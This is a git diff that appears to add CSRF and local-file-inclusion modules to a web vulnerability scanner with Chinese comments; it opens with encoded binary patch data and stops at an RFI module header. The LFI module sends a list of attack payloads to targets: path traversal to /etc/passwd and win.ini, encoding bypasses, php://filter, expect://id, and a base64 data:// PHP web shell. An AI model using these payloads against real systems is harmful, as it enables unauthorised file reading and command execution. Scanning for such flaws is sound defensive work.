zmjPoWJHIBi1ldKL3<-~k+92zg0&5&RxG7o7L?Z#g5^PGv{&H(=nq<~&kY2K4i%Bn?
zl6PwwD0hlYo)jlitrEEbYt{`=ADvB?G^TViPV5h2=L)@RgL?t67sMKq!>iEaJqN@P
zB(I$f7&B?kY0)w5d5O=9q}a%xM+3XRC_|40B|J>JO#^2XjY_l#%ZRg4%4AFpGPmBQ
zX3V5kSX(NYrC+j>dp$dBdM2wy;Wli`yG<&XKZy@Xm5r%v2C=6cy`)^pnk$;dW=M8k
zE)gFc%RwN?f#ptRQ;WT9L%b=B<|MlAoFkLVED&>m-pT_DthhXx{CXu*z!cW&@tj>b
z6?0gZVv0mel-e~y+C__HN8eHmu&nPb75%%)MOX9<HkQR=dubdUw7X4sx=`#$cx;ko
zrc_oL_7X!U_ESQeOKxd1So+ngpw;DKt2f9xgA~lqPMDtnLB7;eq;7!2i4S1jLM5CW
zg4w(TW)IpqHYLV^UP=?&`2YQEthA*8W>x)J&codVU%&i3T$ywp;+TKcnP|aYYf{F~
zMq3(FO)#^j-oVdCz(&9_fWVF-P7cVyzO!1yH?Z#n!%=r?4824{(u9Yp=(UPowp0->
z<1KN)`cm#rU6r~)(Fw+nygO=t`6bG%{Q_mmI>&D<(^BXEDb!lW+q2J|9-n#c_~pr;
z2pSOn_Li9YLI{_8<@C?5eE(IE%f%hmR$54T?)2<8&Jey9w5mf+V3L1wV)m_{Uyl06
zYet-du<J<k#_@b4Fs7e*{V!%;d3pA)P6Nw4bNJ{d-<jYe%#6M`ckUP*3*HI_96C;k
z`sJ<sv0-A3&)0!3v6a55pzonSMbmaVwl(Z4;6v0d76ow4u!YWP5jtT1kW-=%8+Voo
z89*dF<jCX-Ss5S)9$SG$9hPEGMz<W+5Na=VTt!ozdI5Q;rHXzTIjcxcZ$dfp`UXx5
zyVmwSgKi(EBYi`p2;oS`LE#)<8%nSHN7xlyWsFFRcbMP-x8dlu2~xxmtd-tusKaMh
zfR7HETpuoXj_*IE`<=NOT>tyJ5`w;&VV1qA;uKH;xM~HgL^$O>uX6~*aAN(*DN&^k
z=al(lDC%KU<~!kj1sp*yrvghDzw1*IWCVBL%$+%oI+E?Y%Dt7o;spPjiu(Hco6>3V
zZWKjuz2TJGw=vyt0_z?4AV;0yz=@j37sAPB1!VRq_VJY;kNJ)8hNFhD!&phmtptqZ
z5dos}xL{F!irgO`clL$nF2DbBtjBlH&i?c`@eojlpds%OBZqy8ro*4S{tYk~PPpP|
z?u{SJzH$VRkvAuvdF#;3ljDd-om=>znRj1+&?`TBcJ9nKX3qX%?%dO}@4W{3fF1PQ
zuU>%bkt}*1)rbtG$KkUJJ<NXy-HewX0Um?t9H$WkElvv?f=;lUbHS-KJk>bpJHY9k
zE^i;4H^-ww?88uPE{%2JmI!PH5o25SAb4IumhNWyHovdV(_gn5)Gc_Z^V1^mjdo(f
zoknDme~M?~5(3C&M<5pd4Fs`&i{Q5iE&$+rlD`d!^tI4hPUH3OCZZ@doBb~c{vN?U
zAoxcF|BL|m0E)DN4T0-ZWMytauGtg6z(GHD^2)In=gyn~TthC^k29K&%PVeaKeGA4
z92XJOkLVX|v4l2AT@Ig_JM-Sm;qUTFTRM3I{fJ$$%3X^gI-E({^<7B7{u6>EE%f6N
z1-{mw96AdJ)A+)nUSf@JX{{xXMPY~RhjA*WYqx)ZQ^7G|Koo_;eE>G@;9dcieGcQi
zih$_Zo<P^50PqebxQQv#&L1R0b(z=S*M}#IVHu#f3_B1#7BJE-A{%=W(~cq_%7VW@
z*Fgj$2p&YR3jyvPvd<tG17I<d^OU@<K#6$HsR-#1=^Ua1r{i(ojtYyjm=tk=(+Jye
zTnd>VgbvC2`AZSB;ynyx1CAx#`xYefBAGw~teA&CX~v~Ul#(+;*D^piL0eca`M!(9
z@~1!&KZD)5TsS00&d+9t)9Fw;9Wmux)}|dc95MuRYR1={+4$zhiT<hD_F&D5$-eVt
z=d;ca2eZ1TwKmws%FaKr<LHjDy{Fiztm<%9Lny0ZDr?cGE|Qg(JOI*U<Ohpdr;M!^
zjizanE417>Wpag$u8`3MB|~^s?Rdu<Uq8}4R`vX@$)-^qcx7fE*>kiAw)H|86;m0N
zqiXQWEjaP`@yACuT*}T9HWF16{copEdZ)72jBbDkIYlQtM?I&UZ#;bZ;fbYF*~^LV
zf_ykDn6=<U&(WT-J>&A<Wz`&!MNH-si;pfI%RbTmLVF}9cP#tpfm7?o7oP5%%4v*P
zmz*j&wf?kaD!2BMwc(8aP5;FGle?#^tHx3U@2h$$yLR5VBz24IqA~k~;iw^4yl7(S
zWb@>jiS`NWc~h`(-L!FiB;OLOX$$7HAJJSgEf~9R%2XC9E(;f1L&er`adW7+dE$ZK
zj;{ran}fxUqaBx`VNIdprio3#2OPoTreN{zBOU*yrpyJWlwo>lh+aCWJ(qemHB7G$
z(d#eK6_Mi7NM&QBvMy3lJ-+1hgORdo(A$Q~TSIWxdfB=5v+Yym8zbeGh^1w+;=KB7
z-DGjFqc>Q&^HS}SNbRCXZR5nkH#;M>O`udN&zm<;HEZQpOEL<wufa7C**B^vbN*QK
zse-VnK4hw&Xbv~6gTIS#W5uTDH;p}VtTU36f8vRwPlR)pgmRWl><j0t4CSo61m#sO
zi<B*l)GUtFG)64-<9pvMj8xV~s_G(j?USza>(35P+Jjpj3f4S)si8H}uq4v37zZ@c
zur$)J{;FPGRRkN!)(-jAvP?Sf8kM;q@0x<jy+?LUMK!ONeQ2t`>X1>n74zM4s(=pX
zH-_>XCrT$8r}G!X5pfAg^i$bwe`-XaQ+q^27<+uYcf1pNxNzgNanpYy22?J(I}*5q
zo<Pw3Xt46JL{x~>E`<>QY)B*6P+>xBFlA-K2$XD)J-_U#l`2>=zYCQ3=Fe^n$S89m
z9H)<+4$&>#!cAf0<|*T5JWdZW{{6<+#OP9|1&cfXp)c6Q{C)q0o?zj9VdMQ%#`{V9
z9yopvq6zgk)vH^#Et6lUT(t~d|IoO4`SwNfe_p2BZdC>4CEKf2!D<z{7wPV`sDf=J
z_m-<d<tlK;oleIU6nU=e-vLs%D-HG(;DdjXow<jL3gsYr!sSi?6|u_5UP)~fz2FIU
zVl`rJF$zLOGQGSgB#CdgvZs7G&}cwtY5-N0Nfdlg2Ni@Q*)d2%1uZTP2@eW@s8me0
zUm&Uzhtqnq#ALQKP-enKk)X`f+(ns*J0IC%y6BszEkH%%MkQquvACy1RQZ6KQr(pw
zO)0t{U4iJ1zHO3{7jjnK=|U>Ewr7t`j_SVN5;1*LwF7EP74)OlmI8gFaO*%7C`L+p
z>jLb#s~IJuBdS1soC?Cgq!Lvi)rCA<!qZie-~pdKKW5Te<Z)`eZA5*5l}&g+=~k8C
z1)n0eh(Qi3h_&gsYXxdNstdP65}rHf1E<6@2!>~Z3X9~znCcabnaQe85!7{cVurAX
zl`W2)R6dA6P%d(K36B(GJB&kv7}&K)bVc8wuFDbIMPqKw(J;}~wN!LP-+&P?SMZU_
zf`gDuI+H83L~Ppvscm^g8EIw;#MXh@V+T=w0LFqFxI3Z(QGz-G`9ShWDiG0w>RK*2
zB?nX3+b(|GK?R~DDiB%cF{mkVM^zw}BLB;fgP@K86$8J?_Qf<3M50REpZlZf9sIa2
z#H&lB`oSU8*TI*41HjgR0!)nm_(}x!FR_H50O0ie799}=;xq{C84RvX<b5R(Gl>EL
zkLAWF5HfiM!q}s~GZ6&>`!<&PSD3AACHqVKcpt&95S&ARk`~;1f#}cvHG<y&AW|C0
z@=^~~vL9eP1*ZV7SiziZq7s>s{X2}25+i0sg~orvjFZS!ynON@hE5@vM(_~;uq~KJ
z_f-TJ5d02(h1|pFK_t{@5y^6oV47myB$2~3xNL&H1hiHxu6>*eZewE)fFUGESz!C9
zcDsCVnw8uS$9{|nE+Tji!K(-)8I4o+dEgpaSb%wPjhFTQ1wY3TTtaXX!6<^e3uKn`
zs2IlL9O85^>|U^i1d)p~ka~i_1n3&PoE8t~5mD?PG4mM`+wIyXh6}O5YzYl7K|Kbx
zk|?;5F`mOD4g~)TfHxfg9rp;rSQ-(#B-G;;+!ibELlnfTkUxW+;A|=-ofpEY#<RvX
z<KBs;iHeEGgIVjQwd=v?F}rB2?}Z0Pb!h)s@bbn}4}}*l2`yYQRj_m_XW6I$1Rz7k
zl)jvosd7rf*_EN}%3xO2xMF-$xVAmS3v_{VPn>-sxMEw-v>mKHKxisB@$k`yUl<<M
zUrf)O&LrYlrYoH83Z)C;SrWNRl&z9WTzL!Oj+W4Z>Zt{_qnp6S@`yiVD1=%URGfNX
zD!*ZLOC+y!Ebmm~shy{`26LK5JLZ-3v8>~rB`K&ga{D!*{F-pSHI#3i&<69Z!Te1}
zw09GdDynZU8ZDXdPYeXxw+Acly#zu_Z6nG<8YOVRI>G_xry&QN2J%qpSCoe=^`aEi
zI=OhVGPueftohod%4!gQ1koo&1)`6Eh(3ksDEg$|D*7-)^!Yl^fNQ=0|9#U-1LA(5
zSZ(M?mH%z#s#<tmNY!mrsxIV|bgWceSg8Vca>K|uSaLxLEZucV_WNaU%ZB`38Qxk1
z%3;VH7-1-Zf4Ts<6Q5G5r!kS0AbY<wOenbB2p3^k9+fe<Ahk$%AeU8QF2LlfpzN2B
z@dTDmEk;dl!ef(eAx*Z=F5U#=*2I*bv=zWcN^EJBP^7aP7#^|sq*ovV!;_LE9niVE
zrqd-!SMWK~>2FQvfEHn2cLKpAOpmMtzKf~O*C_F7WP|@3&=BE{shJm^n|b%x%u`R!
zymc0M68<`<nP;DzIr3wmZoH})^ue>wy%lRTBp96oM-r2qY?8z?C9!u*&HQ8xmQN{D
z-Fi#rO#_<qwboa+Ho(7t(e2p{M=$Yv$>POL&8>kn{tkBZX@q|_Q+D?D!?_6W&IfO%
z?d%10pUaIGrowk18}w~-<C41FgFYJWC#B&!cf1KNU}(E<kj0DfIzV|C(6y}{1SPZ2
z152D?t#H<&3n~#v*+S0G(#skGDQz43JIQUAoN=FreHg9{!z(U8(dhC9)OhNEel!4j
zY`j;Wew5R%U2WgKiec{G*0q+?z()sc5d<onu6{V>u+v+;vkE|O<<8Ovt03?(X5AWF
z*E;(uTX%=u5@_31)w`<h0Y_b+p{}LI`rxC@k6Wq}yqX?we=I)IqQ~3YEi22rZ{{UL
zZEmQ2y#3LJ+C`6BZmRsg{<>wHdT_uER|&o;<J9E5ua~7{pix)1?Zks(&{**dTR_!@
zH%8!<w=69DUYCRIgUfB96;3$oz^VE3?_A36CCyII)5FgksQI@=OBQNQBc4UjK@z-H
z*8_LrrbupbxB*Vk!<y`a%>g&3Atx2#)PssR@a{Iu*6Gy(eu@h)f2Ad|5nN%+dV8x9
z_#MD}FLG4}sedz5#+-;L_nNvOTQ{n^-bUq>k8Zq}o^klVGY7^Ngwt!M(rbmg#mZqF
zfV&6NE@qlfR6k!mwreVL@u=qGtb);X^YWC`tc!VcIIsG{yz24AQ+bWyyk()hWs^A<
za)Wuxf_Ys>G?&fUCpJF6am+KmFKk{KGB3R-cnpr`gw2g1bED`nG`=BhZVs87MUOq>
zny|ScWN!F<e(_ZWmDPAPoysmGYTVD}HL}z!&S<_#u0s8F#%lALTKR8k<!c(_NjPdI
zh~}dK;BmNZ6fTtlFaAkRq(S>3lL#yrZHXk#Q3g_<yi3x6h`E4FBL_VMmXz=?k_CGF
zrf>q0$KgzPk`VcTK;(5|)MUC6uzHUYd1TZQp07ycKM&DOLgXEAsnTtF4oEwrXADHo
zkQ%FJ=!EumKE@O2yN*~|bi~Bba(<q=f(}6(X)&DxguUC;)hJ5d^xc=Nj9YX5Ts6wP
zHQgO*WQx|vCKp@agneqpY?DF1W{Le;4qA+)CU4ROYULEa5Q07cv<||r1myT10R+-r
ze(yW63mLA1hmXL1nzUGb`4vz)C_(llg?s|0s@R3EzIvr)r#q0p-s6Ye&6xW{q9?V<
z%~C9$Qf9RXQV{46ATehR00I?!`qku`68<6{IAjM$7QBN#xH^ekA`Um%#z?y|Oe@E<
zReW0ERwgVLE>RNhJmN3w5NJEA!Zd13Q_iQsEiPOd5)ujba0c=izjtJ?Z_wlSip_!h
zeW0PBVL)XXC)0rpn~J%nAwZQ7ry@5_vFYexM38|X69A`t$TR2`RvgxZ-bnM&q!(|p
zvXhmB%|`zm1i1(n07$Z^T*8C}v5QLL2I6P9rr>!Y*j>w}%-N$_6w>le9C-dfuw?0E
z&Q#8-QNw@J=R^!<Jk=H~YMHDJw{8iwZn<#pRO_~2%l2Twz0-y+kZo?e#;EST##}UI
zooIQ!Wz0T45H>9dnU?&r^ql2g%lVBL_Jv#T54GMOF&CWJc63{C;pPh)g55nqThE2g
z3oC;UJQytB^*gg27MJBcva1?cU2bGjhP1;i&$Jxbd1`4`UlY>T{3Uzlz>f|DTQ*(T
z5Vm%QtleU33f4~>Hb8@g1iMb%AJ*4}^mRYWd}qO5EtqUQzc1XlEz}5S`uNrtte!Tk
znN82Rlx3aJOe!Z$6RG1*O!fs$tAmEsmrOY)T8_4i^-P)I{^o_B%@@N0_p!9Vm9A=D
zpDzE~bou%$Rh*^?B?Pj-?FC2dVF6HF-b&m+<qE3CBwW2nJRG3hh8UP@!jtSa%5qpx
z!LVNL-wBaLj+tEIFI{9ST%daF7qM6T>*CqqAz&@RCWsgpKs4TXhyO8vnb8wq@u4GH
zAJFhb^&<zNME;i3esGc7M}-q3S^WODbO2R2&5C9b;{I^b7-i6nUQ~F1P9iP2O*xFw
z%A+g8CTqxK4H~SG^o-FI-i#dPfb>X1auB@kIwW;>9g_Up4oMQ8L)_m$lQ#SZKM{p{
zDl<?1^va2!%>DdZv+o`uoe96qmDrmD5RXmlO;z8J2YwmB7~6a3Q;)r6g%k&=%lgba
z*xyI*O|D%L)C)HR$95OG2?k@o!H>S+CC|Cw6lAT#XD+|@!&qarZvKY+#EPb(&6Kq9
z&*jEeI5wmS%DRqB99;37Zn|~!l2r#rAW3y3Rp)JL1ZSXy8VOpsykvFa!<Is=SiEY9
zR0vE@o`oXWZzFgL0WrS#4!WL3@F;@A2u2YcL_l<oPk;+=fBtKDTQZW}?8|yFaw>u`
z1g|2vg5dukKuLnvMdJMtEdD+OTZNz&K?jBwBft^jWe-2P5MZUe>j2<oziX~3hw+Br
zU7AK!)s22xt}6Fh^8<2~`PzP^T?Vh!ij}IYYpdlJRpqt&WGSl5YuV&RV2JXm764xY
z=4;6n>I^mDH29MlprmABF9FV%@fu5BTMFDFzZ`M~&|MA<?yiTv1>9BhU+gzAMT$?n
zbe=yTU(b^Vwg(eGfB<okSJNVvuxbEY3Y`DkLVl}*x6V=XSJ(459g_}-?-Wkk#{V9~
z3U&$98vZCRPA}LBmdUPa<uc`UEhW=^Or?EHrIJ7W#}xd5+eD!8V=5Ee|3cj}Mcs2L
z#TZV>`!FSMtbHoQa!`Fk>5$2?j<keLWg%194cI-EW&L5j;_Et@`5J|g^xgjh3tDSX

literal 0
HcmV?d00001

diff --git a/xss_scanner/scanners/csrf_scanner.py b/xss_scanner/scanners/csrf_scanner.py
new file mode 100644
index 0000000..3f5ba9c
--- /dev/null
+++ b/xss_scanner/scanners/csrf_scanner.py
@@ -0,0 +1,199 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+CSRF扫描器模块，负责扫描CSRF漏洞
+"""
+
+import re
+import logging
+import random
+import string
+from urllib.parse import urlparse, urljoin
+from bs4 import BeautifulSoup
+
+logger = logging.getLogger('xss_scanner')
+
+class CSRFScanner:
+    """CSRF扫描器类，负责扫描CSRF漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化CSRF扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 敏感操作关键词
+        self.sensitive_keywords = [
+            'user', 'account', 'profile', 'password', 'email', 'settings',
+            'admin', 'create', 'delete', 'remove', 'update', 'edit', 'modify',
+            'register', 'signup', 'login', 'logout', 'authenticate', 'auth',
+            'transfer', 'payment', 'pay', 'fund', 'money', 'order', 'checkout',
+            'purchase', 'buy', 'shop', 'cart', 'add', 'submit', 'confirm',
+            'upload', 'download', 'send', 'message', 'post', 'comment', 'reply',
+            'subscribe', 'unsubscribe', 'membership', 'join', 'leave'
+        ]
+        
+        # CSRF令牌常见名称
+        self.csrf_token_names = [
+            'csrf', 'xsrf', 'token', '_token', 'authenticity_token',
+            'csrf_token', 'xsrf_token', 'security_token', 'request_token',
+            'csrf-token', 'xsrf-token', 'anti-csrf', 'anti-xsrf',
+            '__RequestVerificationToken', '_csrf', '_xsrf', 'csrfmiddlewaretoken'
+        ]
+    
+    def scan_form(self, url, form, field=None):
+        """
+        扫描表单中的CSRF漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 表单字段（对CSRF扫描不需要）
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 如果是GET方法表单，则不检查CSRF
+        if form['method'].upper() == 'GET':
+            return None
+            
+        # 检查表单是否包含敏感操作关键词
+        form_action = form['action'].lower()
+        form_is_sensitive = any(keyword in form_action for keyword in self.sensitive_keywords)
+        
+        # 检查表单字段名称是否包含敏感关键词
+        for field in form.get('fields', []):
+            if field.get('name') and any(keyword in field['name'].lower() for keyword in self.sensitive_keywords):
+                form_is_sensitive = True
+                break
+                
+        # 如果表单不包含敏感操作，则不检查CSRF
+        if not form_is_sensitive:
+            return None
+            
+        logger.debug(f"扫描CSRF: {form['action']} @ {url}")
+        
+        # 检查表单是否包含CSRF令牌
+        has_csrf_token = False
+        token_field = None
+        
+        for field in form.get('fields', []):
+            field_name = field.get('name', '').lower()
+            
+            # 检查字段名称是否匹配CSRF令牌常见名称
+            if any(token_name in field_name for token_name in self.csrf_token_names):
+                has_csrf_token = True
+                token_field = field['name']
+                break
+                
+        # 如果表单包含CSRF令牌，则需要进一步验证
+        if has_csrf_token:
+            # 再次请求页面，验证CSRF令牌是否会改变
+            try:
+                token_value1 = self._get_csrf_token_value(url, token_field)
+                token_value2 = self._get_csrf_token_value(url, token_field)
+                
+                # 如果两次请求的令牌值相同，则可能存在CSRF漏洞
+                if token_value1 == token_value2:
+                    # 生成表单的唯一标识
+                    form_id = f"{form.get('id', '')}-{form['action']}"
+                    return {
+                        'type': 'CSRF',
+                        'url': url,
+                        'form_id': form_id,
+                        'parameter': token_field,
+                        'description': '表单中的CSRF令牌值在多次请求中保持不变，可能存在CSRF漏洞',
+                        'severity': 'Medium',
+                        'details': {
+                            'form_action': form['action'],
+                            'token_field': token_field,
+                            'token_value': token_value1
+                        }
+                    }
+            except Exception as e:
+                logger.error(f"验证CSRF令牌时出错: {str(e)}")
+        else:
+            # 如果表单不包含CSRF令牌，则存在CSRF漏洞
+            # 生成表单的唯一标识
+            form_id = f"{form.get('id', '')}-{form['action']}"
+            return {
+                'type': 'CSRF',
+                'url': url,
+                'form_id': form_id,
+                'description': '表单缺少CSRF令牌，可能存在CSRF漏洞',
+                'severity': 'High',
+                'details': {
+                    'form_action': form['action'],
+                    'form_method': form['method']
+                }
+            }
+            
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的CSRF漏洞（不适用于参数扫描）
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # CSRF漏洞通常与表单相关，不适用于URL参数扫描
+        return None
+    
+    def _get_csrf_token_value(self, url, token_field):
+        """
+        获取页面中CSRF令牌的值
+        
+        Args:
+            url: 页面URL
+            token_field: 令牌字段名
+            
+        Returns:
+            str: 令牌值，如果未找到则返回None
+        """
+        response = self.http_client.get(url)
+        if not response:
+            return None
+            
+        # 解析HTML
+        try:
+            soup = BeautifulSoup(response.text, 'html.parser')
+            
+            # 查找匹配的输入字段
+            input_field = soup.find('input', {'name': token_field})
+            if input_field and input_field.has_attr('value'):
+                return input_field['value']
+                
+            # 查找匹配的meta标签
+            meta_field = soup.find('meta', {'name': token_field})
+            if meta_field and meta_field.has_attr('content'):
+                return meta_field['content']
+                
+            # 查找匹配的JavaScript变量（简单实现，可能不适用于所有情况）
+            script_tags = soup.find_all('script')
+            for script in script_tags:
+                if script.string and token_field in script.string:
+                    # 简单的正则表达式匹配
+                    match = re.search(f"{token_field}['\"]?\\s*[:=]\\s*['\"]([^'\"]+)['\"]", script.string)
+                    if match:
+                        return match.group(1)
+        except Exception as e:
+            logger.error(f"获取CSRF令牌时发生错误: {str(e)}")
+            
+        return None
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return False 
\ No newline at end of file
diff --git a/xss_scanner/scanners/lfi_scanner.py b/xss_scanner/scanners/lfi_scanner.py
new file mode 100644
index 0000000..e2d8636
--- /dev/null
+++ b/xss_scanner/scanners/lfi_scanner.py
@@ -0,0 +1,331 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+LFI（本地文件包含）扫描器模块，负责扫描LFI漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import os
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class LFIScanner:
+    """LFI扫描器类，负责扫描本地文件包含漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化LFI扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # LFI检测Payload
+        self.payloads = [
+            # 基本路径遍历
+            "../../../../../../../etc/passwd",
+            "../../../../../../etc/passwd",
+            "../../../../../etc/passwd",
+            "../../../../etc/passwd",
+            "../../../etc/passwd",
+            "../../etc/passwd",
+            "../etc/passwd",
+            
+            # Windows系统文件
+            "../../../../../../../windows/win.ini",
+            "../../../../../../windows/win.ini",
+            "../../../../../windows/win.ini",
+            "../../../../windows/win.ini",
+            "../../../windows/win.ini",
+            "../../windows/win.ini",
+            "../windows/win.ini",
+            
+            # URL编码绕过
+            "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
+            "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+            "%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd",
+            
+            # 空字节截断 (仅适用于某些PHP版本)
+            "../../../../../../../etc/passwd%00",
+            "../../../../../../../etc/passwd\0",
+            
+            # 双重URL编码
+            "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd",
+            
+            # 使用斜杠绕过
+            "....//....//....//etc/passwd",
+            "..././..././..././etc/passwd",
+            
+            # 使用过滤器包装器 (PHP)
+            "php://filter/convert.base64-encode/resource=/etc/passwd",
+            "php://filter/read=convert.base64-encode/resource=/etc/passwd",
+            "php://input",
+            "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ZWNobyAiU3VjY2VzcyI7Pz4=",
+            "expect://id",
+            
+            # 使用伪协议
+            "file:///etc/passwd",
+            "file:///../../../etc/passwd",
+            
+            # 路径参数污染
+            "file.php?path=/etc/passwd",
+            "file.php?path=../../../etc/passwd",
+            
+            # 向后兼容绕过
+            "/..././..././..././etc/passwd",
+            
+            # 绝对路径
+            "/etc/passwd",
+            "c:\\windows\\win.ini",
+            
+            # 嵌套的遍历序列
+            "....//....//....//etc/passwd",
+            "../....//....//etc/passwd",
+            
+            # 特殊字符绕过
+            "..%252f..%252f..%252fetc%252fpasswd",
+            
+            # Null字节混淆
+            "../../../etc/passwd%00.jpg",
+            "../../../etc/passwd\0.jpg",
+            
+            # Unicode / UTF-8编码
+            "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
+            "%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/etc/passwd"
+        ]
+        
+        # LFI成功检测模式
+        self.unix_patterns = [
+            # /etc/passwd文件内容特征
+            "root:.*:0:0:",
+            "bin:.*:1:1:",
+            "daemon:.*:2:2:",
+            "ftpuser:.*:.",
+            "rsh",
+            "ssh",
+            ".*usr.*bin.*\n"
+        ]
+        
+        self.windows_patterns = [
+            # Windows系统文件特征
+            "\\[extensions\\]",
+            "\\[mci extensions\\]",
+            "\\[fonts\\]",
+            "\\[files\\]",
+            "MAPI=1",
+            "mail=",
+            "\\[Mail\\]",
+            "\\[MCI Extensions\\]"
+        ]
+        
+        # PHP错误模式 (可能表明有漏洞，但需要进一步利用)
+        self.php_error_patterns = [
+            "failed to open stream: No such file or directory",
+            "failed to open stream: Permission denied",
+            "Failed opening required",
+            "Warning: include\\(",
+            "Warning: require_once\\(",
+            "Warning: require\\(",
+            "Warning: include_once\\("
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的LFI漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在LFI的字段名称
+        lfi_prone_fields = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in lfi_prone_fields):
+            return None
+            
+        logger.debug(f"扫描LFI: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测LFI漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含文件内容特征
+                if self._check_lfi_success(response.text):
+                    return {
+                        'type': 'LFI',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现本地文件包含(LFI)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在LFI漏洞，可以读取服务器上的敏感文件",
+                        'recommendation': "避免将用户输入直接传递给文件系统操作，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描LFI时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的LFI漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在LFI的参数名称
+        lfi_prone_params = [
+            'file', 'path', 'page', 'document', 'folder', 'root', 'path',
+            'pg', 'style', 'pdf', 'template', 'php_path', 'doc', 'include'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in lfi_prone_params):
+            return None
+            
+        logger.debug(f"扫描LFI参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测LFI漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                response = self.http_client.get(test_url)
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含文件内容特征
+                if self._check_lfi_success(response.text):
+                    return {
+                        'type': 'LFI',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现本地文件包含(LFI)漏洞",
+                        'details': f"URL参数{param}存在LFI漏洞，可以读取服务器上的敏感文件",
+                        'recommendation': "避免将用户输入直接传递给文件系统操作，实施白名单验证，使用间接引用"
+                    }
+            except Exception as e:
+                logger.error(f"扫描LFI参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_lfi_success(self, content):
+        """
+        检查响应内容中是否包含LFI成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含LFI成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查Unix系统文件特征
+        for pattern in self.unix_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        # 检查Windows系统文件特征
+        for pattern in self.windows_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+        
+        # 检查PHP错误信息特征
+        # 注意：这需要进一步的验证，因为错误信息可能只是表明有漏洞，但未被成功利用
+        for pattern in self.php_error_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                # 检查是否同时包含敏感信息，如路径
+                if re.search("/(var|etc|usr|opt|home)/", content):
+                    return True
+                if re.search("([A-Za-z]:\\\\|System32|Program Files)", content):
+                    return True
+                
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/rfi_scanner.py b/xss_scanner/scanners/rfi_scanner.py
new file mode 100644
